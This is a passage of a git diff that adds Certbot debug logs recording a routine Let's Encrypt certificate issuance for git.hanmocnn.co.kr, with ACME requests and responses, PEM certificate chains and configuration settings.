"payload": "ewogICJjc3IiOiAiTUlJQktEQ0Jyd0lCQURBQU1IWXdFQVlIS29aSXpqMENBUVlGSzRFRUFDSURZZ0FFM1pCMWRlZWJsZ29WTW9QVUsyaUZVNUZid0xLRkhXS19KdExmbWRMaHV6UVJEdFFNUjNwVjVBNFc4TldJTnZGV0VjV2RSSDJScXYwdUl3V2VzUVpZUkhjQ2NDR0ladlljRi1kbXdzWjFqTGdlOVJTb18ta0xkaExYeVo3NTRhZlpvREF3TGdZSktvWklodmNOQVFrT01TRXdIekFkQmdOVkhSRUVGakFVZ2hKbmFYUXVhR0Z1Ylc5amJtNHVZMjh1YTNJd0NnWUlLb1pJemowRUF3SURhQUF3WlFJd2FXNDkwcXV0SFV2U0tMcTVVMkRJT1R5Q0pFUlNLWkZMMTNVU08zTVlSSmJTQnoxMXZLN3JBZ0o3ZTRxS1h6cVdBakVBOE9ORm1FaldtdDI4Mzl1aUo2dmJrTEw3SnE1bjJVaDhhOUxkY05BNWN5YmtvaFhaMHRTcUg3eFl0cXBoUUhKSyIKfQ"
|
||||||
|
}
|
||||||
|
2026-02-15 01:52:01,344:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/finalize/3064386906/480408820986 HTTP/1.1" 200 454
|
||||||
|
2026-02-15 01:52:01,344:DEBUG:acme.client:Received response:
|
||||||
|
HTTP 200
|
||||||
|
Server: nginx
|
||||||
|
Date: Sun, 15 Feb 2026 01:52:01 GMT
|
||||||
|
Content-Type: application/json
|
||||||
|
Content-Length: 454
|
||||||
|
Connection: keep-alive
|
||||||
|
Boulder-Requester: 3064386906
|
||||||
|
Cache-Control: public, max-age=0, no-cache
|
||||||
|
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
|
||||||
|
Location: https://acme-v02.api.letsencrypt.org/acme/order/3064386906/480408820986
|
||||||
|
Replay-Nonce: 4AH-2vvBzRXHMbksCZ9MitMQBxuAI6PDVAP-3e54n20kYQvuOz0
|
||||||
|
X-Frame-Options: DENY
|
||||||
|
Strict-Transport-Security: max-age=604800
|
||||||
|
|
||||||
|
{
|
||||||
|
"status": "valid",
|
||||||
|
"expires": "2026-02-22T01:51:50Z",
|
||||||
|
"identifiers": [
|
||||||
|
{
|
||||||
|
"type": "dns",
|
||||||
|
"value": "git.hanmocnn.co.kr"
|
||||||
|
}
|
||||||
|
],
|
||||||
|
"authorizations": [
|
||||||
|
"https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658839462036"
|
||||||
|
],
|
||||||
|
"finalize": "https://acme-v02.api.letsencrypt.org/acme/finalize/3064386906/480408820986",
|
||||||
|
"certificate": "https://acme-v02.api.letsencrypt.org/acme/cert/054e36e9f42aabaf70387418b62af9b2ae9a"
|
||||||
|
}
|
||||||
|
2026-02-15 01:52:01,345:DEBUG:acme.client:Storing nonce: 4AH-2vvBzRXHMbksCZ9MitMQBxuAI6PDVAP-3e54n20kYQvuOz0
|
||||||
|
2026-02-15 01:52:02,345:DEBUG:acme.client:JWS payload:
|
||||||
|
b''
|
||||||
|
2026-02-15 01:52:02,350:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/order/3064386906/480408820986:
|
||||||
|
{
|
||||||
|
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICI0QUgtMnZ2QnpSWEhNYmtzQ1o5TWl0TVFCeHVBSTZQRFZBUC0zZTU0bjIwa1lRdnVPejAiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL29yZGVyLzMwNjQzODY5MDYvNDgwNDA4ODIwOTg2In0",
|
||||||
|
"signature": "jIOWDfbpSclKLuMx3QNoqmW8J4i1EJ1IYnOzI3eV2bSQkEFKG5OE5NOnL72UA1PpQZnlvc95NYjxoW2tjBlXQKKHAqoAmiq0ivoAQhb14KcV8TZKs7QqG6_broa6iXrBUHpEzK4njjtDoDYwczCt-lQgLNczaflbLBsAX-BkoGSQRYyg4NxblkbT-gGYqd5r5WKCDahRQS4jXSF0pyY8Nym6dipk5JVWoRqqRGWzMpcvLtArLqdJTT2aHdWLP4FfO79_eASLhRHb-65Hbzqvel0OAXDKf1oFlIQqOpyxyvXU4EeSkVTfo15TIPn8gwwWGuPrJicVtj-OX0uFIJywRw",
|
||||||
|
"payload": ""
|
||||||
|
}
|
||||||
|
2026-02-15 01:52:02,549:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/order/3064386906/480408820986 HTTP/1.1" 200 454
|
||||||
|
2026-02-15 01:52:02,550:DEBUG:acme.client:Received response:
|
||||||
|
HTTP 200
|
||||||
|
Server: nginx
|
||||||
|
Date: Sun, 15 Feb 2026 01:52:02 GMT
|
||||||
|
Content-Type: application/json
|
||||||
|
Content-Length: 454
|
||||||
|
Connection: keep-alive
|
||||||
|
Cache-Control: public, max-age=0, no-cache
|
||||||
|
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index"
|
||||||
|
Location: https://acme-v02.api.letsencrypt.org/acme/order/3064386906/480408820986
|
||||||
|
Replay-Nonce: NeKnt8TGkqXwrDlo3sRFrYaf3v4XwpOPFLYdKHKI5vRZk1dZOn0
|
||||||
|
X-Frame-Options: DENY
|
||||||
|
Strict-Transport-Security: max-age=604800
|
||||||
|
|
||||||
|
{
|
||||||
|
"status": "valid",
|
||||||
|
"expires": "2026-02-22T01:51:50Z",
|
||||||
|
"identifiers": [
|
||||||
|
{
|
||||||
|
"type": "dns",
|
||||||
|
"value": "git.hanmocnn.co.kr"
|
||||||
|
}
|
||||||
|
],
|
||||||
|
"authorizations": [
|
||||||
|
"https://acme-v02.api.letsencrypt.org/acme/authz/3064386906/658839462036"
|
||||||
|
],
|
||||||
|
"finalize": "https://acme-v02.api.letsencrypt.org/acme/finalize/3064386906/480408820986",
|
||||||
|
"certificate": "https://acme-v02.api.letsencrypt.org/acme/cert/054e36e9f42aabaf70387418b62af9b2ae9a"
|
||||||
|
}
|
||||||
|
2026-02-15 01:52:02,551:DEBUG:acme.client:Storing nonce: NeKnt8TGkqXwrDlo3sRFrYaf3v4XwpOPFLYdKHKI5vRZk1dZOn0
|
||||||
|
2026-02-15 01:52:02,551:DEBUG:acme.client:JWS payload:
|
||||||
|
b''
|
||||||
|
2026-02-15 01:52:02,555:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/cert/054e36e9f42aabaf70387418b62af9b2ae9a:
|
||||||
|
{
|
||||||
|
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJOZUtudDhUR2txWHdyRGxvM3NSRnJZYWYzdjRYd3BPUEZMWWRLSEtJNXZSWmsxZFpPbjAiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2NlcnQvMDU0ZTM2ZTlmNDJhYWJhZjcwMzg3NDE4YjYyYWY5YjJhZTlhIn0",
|
||||||
|
"signature": "nz8-mSztJHODU29TN2pD_L46rJK8QVsmtb1_QbSXQRyk754h8k1Q8XSnP8tzOcKtA395gCZWX3hP1oeBxnjUOFM8tT7jBT41GP5BjL0Qvy5xhReAiIX4e6JKtAcV8p4ooW8vBLwhPao8NkebadKwRSN5XzprOAvEQnzUN7mMrTykTRPSl81nkAVg0I5iD8y8PqS16ZrlpJdaeuECh_YnZVAiA64Q1bUY1vOCfY6z655MlhdxGOhE1EziZRjFrWR8zAXsSO5r_5lMd04JUujOK7bR_PVNdgWHirPx-KwaaOIzghYgbG86saj_I7oK-54fxmZCoc-jX2rQ5zeZSduHUw",
|
||||||
|
"payload": ""
|
||||||
|
}
|
||||||
|
2026-02-15 01:52:02,716:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/cert/054e36e9f42aabaf70387418b62af9b2ae9a HTTP/1.1" 200 2893
|
||||||
|
2026-02-15 01:52:02,717:DEBUG:acme.client:Received response:
|
||||||
|
HTTP 200
|
||||||
|
Server: nginx
|
||||||
|
Date: Sun, 15 Feb 2026 01:52:02 GMT
|
||||||
|
Content-Type: application/pem-certificate-chain
|
||||||
|
Content-Length: 2893
|
||||||
|
Connection: keep-alive
|
||||||
|
Cache-Control: public, max-age=0, no-cache
|
||||||
|
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index", <https://acme-v02.api.letsencrypt.org/acme/cert/054e36e9f42aabaf70387418b62af9b2ae9a/1>;rel="alternate"
|
||||||
|
Replay-Nonce: NeKnt8TGUmr5hRmt5v4kyV_zjaCxjD5GACGBv7voiKKjqOzNOfw
|
||||||
|
X-Frame-Options: DENY
|
||||||
|
Strict-Transport-Security: max-age=604800
|
||||||
|
|
||||||
|
-----BEGIN CERTIFICATE-----
|
||||||
|
MIIDpTCCAyugAwIBAgISBU426fQqq69wOHQYtir5sq6aMAoGCCqGSM49BAMDMDIx
|
||||||
|
CzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJF
|
||||||
|
NzAeFw0yNjAyMTUwMDUzMjlaFw0yNjA1MTYwMDUzMjhaMB0xGzAZBgNVBAMTEmdp
|
||||||
|
dC5oYW5tb2Nubi5jby5rcjB2MBAGByqGSM49AgEGBSuBBAAiA2IABN2QdXXnm5YK
|
||||||
|
FTKD1CtohVORW8CyhR1ivybS35nS4bs0EQ7UDEd6VeQOFvDViDbxVhHFnUR9kar9
|
||||||
|
LiMFnrEGWER3AnAhiGb2HBfnZsLGdYy4HvUUqP/pC3YS18me+eGn2aOCAhcwggIT
|
||||||
|
MA4GA1UdDwEB/wQEAwIHgDATBgNVHSUEDDAKBggrBgEFBQcDATAMBgNVHRMBAf8E
|
||||||
|
AjAAMB0GA1UdDgQWBBRaL2bTWA0MjQBBBgZygk0nxCro8jAfBgNVHSMEGDAWgBSu
|
||||||
|
SJ7chx1EoG/aouVgdAR4wpwAgDAyBggrBgEFBQcBAQQmMCQwIgYIKwYBBQUHMAKG
|
||||||
|
Fmh0dHA6Ly9lNy5pLmxlbmNyLm9yZy8wHQYDVR0RBBYwFIISZ2l0Lmhhbm1vY25u
|
||||||
|
LmNvLmtyMBMGA1UdIAQMMAowCAYGZ4EMAQIBMC0GA1UdHwQmMCQwIqAgoB6GHGh0
|
||||||
|
dHA6Ly9lNy5jLmxlbmNyLm9yZy8yNy5jcmwwggEFBgorBgEEAdZ5AgQCBIH2BIHz
|
||||||
|
APEAdwBkEcRspBLsp4kcogIuALyrTygH1B41J6vq/tUDyX3N8AAAAZxe/1qdAAAE
|
||||||
|
AwBIMEYCIQDwNplXasmzKSLIez7kR/jYwBmY+92fo0Oe9xTRW/LYwQIhALQ+kEkk
|
||||||
|
pUvSpkEcvMoHJVABdfGiHZZbWkgt7CSOPBySAHYAFoMtq/CpJQ8P8DqlRf/Iv8gj
|
||||||
|
0IdL9gQpJ/jnHzMT9foAAAGcXv9irwAABAMARzBFAiBKJHYXSD4GUqumXq5TLt3A
|
||||||
|
HS9ZM08kl/NzaSz0eNoTAgIhAMldLvgzn+UR9VyLT3n2KT6n82wIo035yLwnogk5
|
||||||
|
KY/lMAoGCCqGSM49BAMDA2gAMGUCMQDBWHS4t+nwA0lkvbQcsUqQq3uabapszHs1
|
||||||
|
ZVOVAO4J+Vfx3wgTRO8Dx8F33rBWndYCMGC0CN463ukm+NgQt/ByckZ2/rxaUm9S
|
||||||
|
AhNC3oI5CvlMIrXyWD67+cCSiTNiQIuD7A==
|
||||||
|
-----END CERTIFICATE-----
|
||||||
|
|
||||||
|
-----BEGIN CERTIFICATE-----
|
||||||
|
MIIEVzCCAj+gAwIBAgIRAKp18eYrjwoiCWbTi7/UuqEwDQYJKoZIhvcNAQELBQAw
|
||||||
|
TzELMAkGA1UEBhMCVVMxKTAnBgNVBAoTIEludGVybmV0IFNlY3VyaXR5IFJlc2Vh
|
||||||
|
cmNoIEdyb3VwMRUwEwYDVQQDEwxJU1JHIFJvb3QgWDEwHhcNMjQwMzEzMDAwMDAw
|
||||||
|
WhcNMjcwMzEyMjM1OTU5WjAyMQswCQYDVQQGEwJVUzEWMBQGA1UEChMNTGV0J3Mg
|
||||||
|
RW5jcnlwdDELMAkGA1UEAxMCRTcwdjAQBgcqhkjOPQIBBgUrgQQAIgNiAARB6AST
|
||||||
|
CFh/vjcwDMCgQer+VtqEkz7JANurZxLP+U9TCeioL6sp5Z8VRvRbYk4P1INBmbef
|
||||||
|
QHJFHCxcSjKmwtvGBWpl/9ra8HW0QDsUaJW2qOJqceJ0ZVFT3hbUHifBM/2jgfgw
|
||||||
|
gfUwDgYDVR0PAQH/BAQDAgGGMB0GA1UdJQQWMBQGCCsGAQUFBwMCBggrBgEFBQcD
|
||||||
|
ATASBgNVHRMBAf8ECDAGAQH/AgEAMB0GA1UdDgQWBBSuSJ7chx1EoG/aouVgdAR4
|
||||||
|
wpwAgDAfBgNVHSMEGDAWgBR5tFnme7bl5AFzgAiIyBpY9umbbjAyBggrBgEFBQcB
|
||||||
|
AQQmMCQwIgYIKwYBBQUHMAKGFmh0dHA6Ly94MS5pLmxlbmNyLm9yZy8wEwYDVR0g
|
||||||
|
BAwwCjAIBgZngQwBAgEwJwYDVR0fBCAwHjAcoBqgGIYWaHR0cDovL3gxLmMubGVu
|
||||||
|
Y3Iub3JnLzANBgkqhkiG9w0BAQsFAAOCAgEAjx66fDdLk5ywFn3CzA1w1qfylHUD
|
||||||
|
aEf0QZpXcJseddJGSfbUUOvbNR9N/QQ16K1lXl4VFyhmGXDT5Kdfcr0RvIIVrNxF
|
||||||
|
h4lqHtRRCP6RBRstqbZ2zURgqakn/Xip0iaQL0IdfHBZr396FgknniRYFckKORPG
|
||||||
|
yM3QKnd66gtMst8I5nkRQlAg/Jb+Gc3egIvuGKWboE1G89NTsN9LTDD3PLj0dUMr
|
||||||
|
OIuqVjLB8pEC6yk9enrlrqjXQgkLEYhXzq7dLafv5Vkig6Gl0nuuqjqfp0Q1bi1o
|
||||||
|
yVNAlXe6aUXw92CcghC9bNsKEO1+M52YY5+ofIXlS/SEQbvVYYBLZ5yeiglV6t3S
|
||||||
|
M6H+vTG0aP9YHzLn/KVOHzGQfXDP7qM5tkf+7diZe7o2fw6O7IvN6fsQXEQQj8TJ
|
||||||
|
UXJxv2/uJhcuy/tSDgXwHM8Uk34WNbRT7zGTGkQRX0gsbjAea/jYAoWv0ZvQRwpq
|
||||||
|
Pe79D/i7Cep8qWnA+7AE/3B3S/3dEEYmc0lpe1366A/6GEgk3ktr9PEoQrLChs6I
|
||||||
|
tu3wnNLB2euC8IKGLQFpGtOO/2/hiAKjyajaBP25w1jF0Wl8Bbqne3uZ2q1GyPFJ
|
||||||
|
YRmT7/OXpmOH/FVLtwS+8ng1cAmpCujPwteJZNcDG0sF2n/sc0+SQf49fdyUK0ty
|
||||||
|
+VUwFj9tmWxyR/M=
|
||||||
|
-----END CERTIFICATE-----
|
||||||
|
|
||||||
|
2026-02-15 01:52:02,717:DEBUG:acme.client:Storing nonce: NeKnt8TGUmr5hRmt5v4kyV_zjaCxjD5GACGBv7voiKKjqOzNOfw
|
||||||
|
2026-02-15 01:52:02,717:DEBUG:acme.client:JWS payload:
|
||||||
|
b''
|
||||||
|
2026-02-15 01:52:02,722:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/cert/054e36e9f42aabaf70387418b62af9b2ae9a/1:
|
||||||
|
{
|
||||||
|
"protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMzA2NDM4NjkwNiIsICJub25jZSI6ICJOZUtudDhUR1VtcjVoUm10NXY0a3lWX3pqYUN4akQ1R0FDR0J2N3ZvaUtLanFPek5PZnciLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2NlcnQvMDU0ZTM2ZTlmNDJhYWJhZjcwMzg3NDE4YjYyYWY5YjJhZTlhLzEifQ",
|
||||||
|
"signature": "aTci7u9FnehWBU47wxbqDk_wQMGYWTZ17fy0whShTkXp1gcAO8M_DnkNnOzHUZuuC1rSqMv-y3qHuxBBjJFkwx-Ho8YLu5mhyFCAQf46VOSeoTwz4DabP6Sr5OrJ-4PhtuPFdqr9ie1cZEGuzkYUSiCsjX-hdRJtw5cci1BR36DMELHIXKXGAml65MDbIcKHyxcvbtSxkW768HLeStjkzt60g3yay8TEj_WSHCYSAvHWrUBWFov_jefguOq31sKGu-fS5B-qiMbxBYo6E3ADP7qRVtvQ2QJXRAGBMXgr8UQTRmSK0buO7limyayfbOG-7CfrbUH9mw60pRfK4xyy0Q",
|
||||||
|
"payload": ""
|
||||||
|
}
|
||||||
|
2026-02-15 01:52:02,883:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/cert/054e36e9f42aabaf70387418b62af9b2ae9a/1 HTTP/1.1" 200 2328
|
||||||
|
2026-02-15 01:52:02,884:DEBUG:acme.client:Received response:
|
||||||
|
HTTP 200
|
||||||
|
Server: nginx
|
||||||
|
Date: Sun, 15 Feb 2026 01:52:02 GMT
|
||||||
|
Content-Type: application/pem-certificate-chain
|
||||||
|
Content-Length: 2328
|
||||||
|
Connection: keep-alive
|
||||||
|
Cache-Control: public, max-age=0, no-cache
|
||||||
|
Link: <https://acme-v02.api.letsencrypt.org/directory>;rel="index", <https://acme-v02.api.letsencrypt.org/acme/cert/054e36e9f42aabaf70387418b62af9b2ae9a/0>;rel="alternate"
|
||||||
|
Replay-Nonce: NeKnt8TGzFhXu6tguKanBavnkUUb9vcvolh2BEjWZPFJHUOKePA
|
||||||
|
X-Frame-Options: DENY
|
||||||
|
Strict-Transport-Security: max-age=604800
|
||||||
|
|
||||||
|
-----BEGIN CERTIFICATE-----
|
||||||
|
MIIDpTCCAyugAwIBAgISBU426fQqq69wOHQYtir5sq6aMAoGCCqGSM49BAMDMDIx
|
||||||
|
CzAJBgNVBAYTAlVTMRYwFAYDVQQKEw1MZXQncyBFbmNyeXB0MQswCQYDVQQDEwJF
|
||||||
|
NzAeFw0yNjAyMTUwMDUzMjlaFw0yNjA1MTYwMDUzMjhaMB0xGzAZBgNVBAMTEmdp
|
||||||
|
dC5oYW5tb2Nubi5jby5rcjB2MBAGByqGSM49AgEGBSuBBAAiA2IABN2QdXXnm5YK
|
||||||
|
FTKD1CtohVORW8CyhR1ivybS35nS4bs0EQ7UDEd6VeQOFvDViDbxVhHFnUR9kar9
|
||||||
|
LiMFnrEGWER3AnAhiGb2HBfnZsLGdYy4HvUUqP/pC3YS18me+eGn2aOCAhcwggIT
|
||||||
|
MA4GA1UdDwEB/wQEAwIHgDATBgNVHSUEDDAKBggrBgEFBQcDATAMBgNVHRMBAf8E
|
||||||
|
AjAAMB0GA1UdDgQWBBRaL2bTWA0MjQBBBgZygk0nxCro8jAfBgNVHSMEGDAWgBSu
|
||||||
|
SJ7chx1EoG/aouVgdAR4wpwAgDAyBggrBgEFBQcBAQQmMCQwIgYIKwYBBQUHMAKG
|
||||||
|
Fmh0dHA6Ly9lNy5pLmxlbmNyLm9yZy8wHQYDVR0RBBYwFIISZ2l0Lmhhbm1vY25u
|
||||||
|
LmNvLmtyMBMGA1UdIAQMMAowCAYGZ4EMAQIBMC0GA1UdHwQmMCQwIqAgoB6GHGh0
|
||||||
|
dHA6Ly9lNy5jLmxlbmNyLm9yZy8yNy5jcmwwggEFBgorBgEEAdZ5AgQCBIH2BIHz
|
||||||
|
APEAdwBkEcRspBLsp4kcogIuALyrTygH1B41J6vq/tUDyX3N8AAAAZxe/1qdAAAE
|
||||||
|
AwBIMEYCIQDwNplXasmzKSLIez7kR/jYwBmY+92fo0Oe9xTRW/LYwQIhALQ+kEkk
|
||||||
|
pUvSpkEcvMoHJVABdfGiHZZbWkgt7CSOPBySAHYAFoMtq/CpJQ8P8DqlRf/Iv8gj
|
||||||
|
0IdL9gQpJ/jnHzMT9foAAAGcXv9irwAABAMARzBFAiBKJHYXSD4GUqumXq5TLt3A
|
||||||
|
HS9ZM08kl/NzaSz0eNoTAgIhAMldLvgzn+UR9VyLT3n2KT6n82wIo035yLwnogk5
|
||||||
|
KY/lMAoGCCqGSM49BAMDA2gAMGUCMQDBWHS4t+nwA0lkvbQcsUqQq3uabapszHs1
|
||||||
|
ZVOVAO4J+Vfx3wgTRO8Dx8F33rBWndYCMGC0CN463ukm+NgQt/ByckZ2/rxaUm9S
|
||||||
|
AhNC3oI5CvlMIrXyWD67+cCSiTNiQIuD7A==
|
||||||
|
-----END CERTIFICATE-----
|
||||||
|
|
||||||
|
-----BEGIN CERTIFICATE-----
|
||||||
|
MIICtzCCAjygAwIBAgIRAMWKhaLGI0XgqMRSU4efWTowCgYIKoZIzj0EAwMwTzEL
|
||||||
|
MAkGA1UEBhMCVVMxKTAnBgNVBAoTIEludGVybmV0IFNlY3VyaXR5IFJlc2VhcmNo
|
||||||
|
IEdyb3VwMRUwEwYDVQQDEwxJU1JHIFJvb3QgWDIwHhcNMjQwMzEzMDAwMDAwWhcN
|
||||||
|
MjcwMzEyMjM1OTU5WjAyMQswCQYDVQQGEwJVUzEWMBQGA1UEChMNTGV0J3MgRW5j
|
||||||
|
cnlwdDELMAkGA1UEAxMCRTcwdjAQBgcqhkjOPQIBBgUrgQQAIgNiAARB6ASTCFh/
|
||||||
|
vjcwDMCgQer+VtqEkz7JANurZxLP+U9TCeioL6sp5Z8VRvRbYk4P1INBmbefQHJF
|
||||||
|
HCxcSjKmwtvGBWpl/9ra8HW0QDsUaJW2qOJqceJ0ZVFT3hbUHifBM/2jgfgwgfUw
|
||||||
|
DgYDVR0PAQH/BAQDAgGGMB0GA1UdJQQWMBQGCCsGAQUFBwMCBggrBgEFBQcDATAS
|
||||||
|
BgNVHRMBAf8ECDAGAQH/AgEAMB0GA1UdDgQWBBSuSJ7chx1EoG/aouVgdAR4wpwA
|
||||||
|
gDAfBgNVHSMEGDAWgBR8Qpau3ktIO/qS+J6Mz22LqXI3lTAyBggrBgEFBQcBAQQm
|
||||||
|
MCQwIgYIKwYBBQUHMAKGFmh0dHA6Ly94Mi5pLmxlbmNyLm9yZy8wEwYDVR0gBAww
|
||||||
|
CjAIBgZngQwBAgEwJwYDVR0fBCAwHjAcoBqgGIYWaHR0cDovL3gyLmMubGVuY3Iu
|
||||||
|
b3JnLzAKBggqhkjOPQQDAwNpADBmAjEA/e5N+wjAk945cpaFxGaeMC13fyvdbNzX
|
||||||
|
lRg9HNdElxi5mXdI4az2CykNU07iFwqEAjEAihPCDkw4b1BvfLg8VNLLuaMpn1Rb
|
||||||
|
Z1682chR6zNRCseyie4SjyTCdkvsAa+omQSf
|
||||||
|
-----END CERTIFICATE-----
|
||||||
|
|
||||||
|
2026-02-15 01:52:02,884:DEBUG:acme.client:Storing nonce: NeKnt8TGzFhXu6tguKanBavnkUUb9vcvolh2BEjWZPFJHUOKePA
|
||||||
|
2026-02-15 01:52:02,885:INFO:certbot._internal.client:Non-standard path(s), might not work with crontab installed by your operating system package manager
|
||||||
|
2026-02-15 01:52:02,900:DEBUG:certbot._internal.storage:Creating directory /etc/letsencrypt/archive/npm-6.
|
||||||
|
2026-02-15 01:52:02,900:DEBUG:certbot._internal.storage:Creating directory /etc/letsencrypt/live/npm-6.
|
||||||
|
2026-02-15 01:52:02,900:DEBUG:certbot._internal.storage:Writing certificate to /etc/letsencrypt/live/npm-6/cert.pem.
|
||||||
|
2026-02-15 01:52:02,900:DEBUG:certbot._internal.storage:Writing private key to /etc/letsencrypt/live/npm-6/privkey.pem.
|
||||||
|
2026-02-15 01:52:02,900:DEBUG:certbot._internal.storage:Writing chain to /etc/letsencrypt/live/npm-6/chain.pem.
|
||||||
|
2026-02-15 01:52:02,901:DEBUG:certbot._internal.storage:Writing full chain to /etc/letsencrypt/live/npm-6/fullchain.pem.
|
||||||
|
2026-02-15 01:52:02,901:DEBUG:certbot._internal.storage:Writing README to /etc/letsencrypt/live/npm-6/README.
|
||||||
|
2026-02-15 01:52:02,912:DEBUG:certbot.configuration:Var account=ce2ddac5740bb12d4d6591b7fa1728af (set by user).
|
||||||
|
2026-02-15 01:52:02,912:DEBUG:certbot.configuration:Var key_type=ecdsa (set by user).
|
||||||
|
2026-02-15 01:52:02,912:DEBUG:certbot.configuration:Var elliptic_curve=secp384r1 (set by user).
|
||||||
|
2026-02-15 01:52:02,912:DEBUG:certbot.configuration:Var preferred_chain=ISRG Root X1 (set by user).
|
||||||
|
2026-02-15 01:52:02,912:DEBUG:certbot.configuration:Var pref_challs=['http-01'] (set by user).
|
||||||
|
2026-02-15 01:52:02,912:DEBUG:certbot.configuration:Var config_dir=/etc/letsencrypt (set by user).
|
||||||
|
2026-02-15 01:52:02,912:DEBUG:certbot.configuration:Var work_dir=/tmp/letsencrypt-lib (set by user).
|
||||||
|
2026-02-15 01:52:02,912:DEBUG:certbot.configuration:Var logs_dir=/data/logs (set by user).
|
||||||
|
2026-02-15 01:52:02,913:DEBUG:certbot._internal.plugins.selection:Requested authenticator webroot and installer None
|
||||||
|
2026-02-15 01:52:02,913:DEBUG:certbot._internal.plugins.selection:Requested authenticator webroot and installer None
|
||||||
|
2026-02-15 01:52:02,913:DEBUG:certbot.configuration:Var webroot_path=['/data/letsencrypt-acme-challenge'] (set by user).
|
||||||
|
2026-02-15 01:52:02,913:DEBUG:certbot.configuration:Var webroot_map={'git.hanmocnn.co.kr': '/data/letsencrypt-acme-challenge'} (set by user).
|
||||||
|
2026-02-15 01:52:02,915:DEBUG:certbot._internal.display.obj:Notifying user:
|
||||||
|
Successfully received certificate.
|
||||||
|
Certificate is saved at: /etc/letsencrypt/live/npm-6/fullchain.pem
|
||||||
|
Key is saved at: /etc/letsencrypt/live/npm-6/privkey.pem
|
||||||
|
This certificate expires on 2026-05-16.
|
||||||
|
These files will be updated when the certificate renews.
|
||||||
|
2026-02-15 01:52:02,915:DEBUG:certbot._internal.display.obj:Notifying user: NEXT STEPS:
|
||||||
|
2026-02-15 01:52:02,915:DEBUG:certbot._internal.display.obj:Notifying user: - The certificate will need to be renewed before it expires. Certbot can automatically renew the certificate in the background, but you may need to take steps to enable that functionality. See https://certbot.org/renewal-setup for instructions.
|
||||||
|
2026-02-15 01:52:02,919:DEBUG:certbot._internal.display.obj:Notifying user: If you like Certbot, please consider supporting our work by:
|
||||||
|
* Donating to ISRG / Let's Encrypt: https://letsencrypt.org/donate
|
||||||
|
* Donating to EFF: https://eff.org/donate-le
|
||||||
629
npm/data/logs/letsencrypt.log.2
Normal file
629
npm/data/logs/letsencrypt.log.2
Normal file
@@ -0,0 +1,629 @@
|
|||||||
|
2026-02-14 23:56:03,849:DEBUG:certbot._internal.main:certbot version: 5.3.0
|
||||||
|
2026-02-14 23:56:03,850:DEBUG:certbot._internal.main:Location of certbot entry point: /opt/certbot/bin/certbot
|
||||||
|
2026-02-14 23:56:03,850:DEBUG:certbot._internal.main:Arguments: ['--config', '/etc/letsencrypt.ini', '--work-dir', '/tmp/letsencrypt-lib', '--logs-dir', '/data/logs', '--cert-name', 'npm-5', '--agree-tos', '--authenticator', 'webroot', '-m', 'windpacer@hanmocnn.co.kr', '--preferred-challenges', 'http', '--domains', 'hanmocnn.co.kr,www.hanmocnn.co.kr']
|
||||||
|
2026-02-14 23:56:03,850:DEBUG:certbot._internal.main:Discovered plugins: PluginsRegistry(PluginEntryPoint#manual,PluginEntryPoint#null,PluginEntryPoint#standalone,PluginEntryPoint#webroot)
|
||||||
|
2026-02-14 23:56:03,865:DEBUG:certbot._internal.log:Root logging level set at 30
|
||||||
|
2026-02-14 23:56:03,866:DEBUG:certbot._internal.plugins.selection:Requested authenticator webroot and installer None
|
||||||
|
2026-02-14 23:56:03,866:DEBUG:certbot._internal.plugins.selection:Single candidate plugin: * webroot
|
||||||
|
Description: Saves the necessary validation files to a .well-known/acme-challenge/ directory within the nominated webroot path. A separate HTTP server must be running and serving files from the webroot path. HTTP challenge only (wildcards not supported).
|
||||||
|
Interfaces: Authenticator, Plugin
|
||||||
|
Entry point: EntryPoint(name='webroot', value='certbot._internal.plugins.webroot:Authenticator', group='certbot.plugins')
|
||||||
|
Initialized: <certbot._internal.plugins.webroot.Authenticator object at 0xffff8e7a5590>
|
||||||
|
Prep: True
|
||||||
|
2026-02-14 23:56:03,867:DEBUG:certbot._internal.plugins.selection:Selected authenticator <certbot._internal.plugins.webroot.Authenticator object at 0xffff8e7a5590> and installer None
|
||||||
|
2026-02-14 23:56:03,867:INFO:certbot._internal.plugins.selection:Plugins selected: Authenticator webroot, Installer None
|
||||||
|
2026-02-14 23:56:04,100:DEBUG:certbot._internal.main:Picked account: <Account(RegistrationResource(body=Registration(key=None, contact=(), agreement=None, status=None, terms_of_service_agreed=None, only_return_existing=None, external_account_binding=None), uri='https://acme-v02.api.letsencrypt.org/acme/acct/3064386906', new_authzr_uri=None, terms_of_service=None), ce2ddac5740bb12d4d6591b7fa1728af, Meta(creation_dt=datetime.datetime(2026, 2, 14, 22, 37, tzinfo=datetime.timezone.utc), creation_host='312f7928d5ba', register_to_eff=None))>
|
||||||
|
2026-02-14 23:56:04,101:DEBUG:acme.client:Sending GET request to https://acme-v02.api.letsencrypt.org/directory.
|
||||||
